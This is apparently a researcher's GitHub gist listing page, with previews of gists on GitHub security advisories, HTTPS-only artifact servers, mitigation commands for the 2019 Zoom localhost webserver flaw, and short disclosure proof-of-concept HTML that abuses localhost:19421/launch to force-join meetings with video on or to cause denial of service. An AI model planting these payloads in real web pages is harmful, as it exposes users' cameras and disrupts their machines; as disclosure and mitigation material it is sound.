Jonathan Leitschuh JLLeitschuh

Looking at your projects for Security Vulnerabilities.
JLLeitschuh / How To Use GitHub Security
Last active Sep 17, 2019
An explanation of how to work with GitHub security advisories.

GitHub Security Advisories

If this is your first time using GitHub Security Advisories, please allow me to guide you through how they work.

Advisories are Private

As of September 17th, 2019, the discussion inside an advisory is not made public when the advisory is published. Any information you want the public to see must be included in the advisory body itself.

Updating an Advisory

JLLeitschuh / Artifact Server HTTPS Only

Artifact Server Announcements

This document collects links to the announcements from the different artifact server hosts that have formally deprecated downloading dependencies over HTTP and will support only HTTPS starting in January 2020.

Want to take over the Java ecosystem? All you need is a MITM!

Maven Sonatype

# To prevent the vulnerable server from running on your machine
# (this does not impact Zoom functionality), run these two lines in your Terminal.
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
# (You may need to run these lines for each user on your machine.)
# For just your local account
defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# For all users on the machine
sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1
JLLeitschuh /
Created Jul 8, 2019
Permanently removes the Zoom localhost webserver and prevents it from being reinstalled in the future.
rm -rf ~/.zoomus
touch ~/.zoomus
JLLeitschuh / zoom_poc_iframe.html
Created Jul 8, 2019
Simple POC that launches Zoom on Mac with your video camera activated using an iframe.
<iframe src=""/>
JLLeitschuh / zoom_poc_dos.html
Created Jul 7, 2019
Denial of service POC for Zoom
// It's actually better if this number isn't a valid zoom number.
var attackNumber = "694138052";
var image = document.createElement("img");
// Use a date to bust the browser's cache
var date = new Date();
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
JLLeitschuh / zoom_poc_simple.html
Last active Jul 7, 2019
Simplest example of the Zoom exploit
<img src="http://localhost:19421/launch?action=join&confno=492468757"/>
JLLeitschuh / zoom_simple.txt
Created Jul 7, 2019
Simple example of the Zoom Vulnerability
http://localhost:19421/launch?action=join&confno=[some conference number]
JLLeitschuh / UploadToArtifactory.kt
Created Jun 13, 2019
Gradle Plugin Build logic to upload single files to JFrog Artifactory
/* ****************************************************************************** */
// MIT License
// Copyright (c) 2019 Hewlett Packard Enterprise Development LP
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is